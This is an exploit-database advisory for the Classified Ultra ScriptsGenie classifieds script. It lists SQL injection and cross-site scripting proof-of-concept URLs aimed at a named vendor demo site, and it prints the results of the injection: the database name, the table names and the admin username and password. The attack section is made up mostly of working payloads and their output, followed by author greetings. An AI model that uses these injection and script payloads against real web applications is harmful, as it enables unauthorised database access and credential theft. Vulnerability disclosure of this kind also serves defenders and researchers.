Classified Ultra ScriptsGenie Cross Site Scripting / SQL Injection

2013.01.21
Credit: 3spi0n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title; Classified Ultra ScriptsGenie Multiple Vulnerabilities # Date; 20/1/13 # Author; 3spi0n # Script Vendor or Software Link; http://www.hotscripts.com/listing/classified-ultra-scriptsgenie/ # Category; Webapps # Type; SQL Injection [MySQLi] # Tested on; Ubuntu 12.10 / Win7 / Backtrack 5 [#] Demo Analyzing ; # http://resalemembership.com/demos/classifiedultra/nclass.php [Official Demo] [#] Vulnerable Analyzing ; [-] SQL Injection # http://resalemembership.com/demos/classifiedultra/subclass.php?c=16' [SQLi HERE] [...] Analyzing Selected Column Count is 4 Valid String Column is 3 Current DB: resalem1_ultra ... Tables found: Site_Admin,clientsignup,contact,o_ads,o_categories,o_catimages,o_subcategories [Using "Site_Admin"] ... Columns found: id,admin,passme ... Data Found: admin=admin Data Found: passme=pass [-] XSS # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE] [...] Analyzing # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname= <script>alert('3spi0n')</script> # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=<IFRAME SRC="javascript:alert('3spi0n');"></IFRAME> [#] Greetz ; - Grayhatz Inc. & Janissaries Team - Twitter.Com/bariiiscan - Facebook.Com/3spi0ne

References:

http://www.hotscripts.com/listing/classified-ultra-scriptsgenie/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top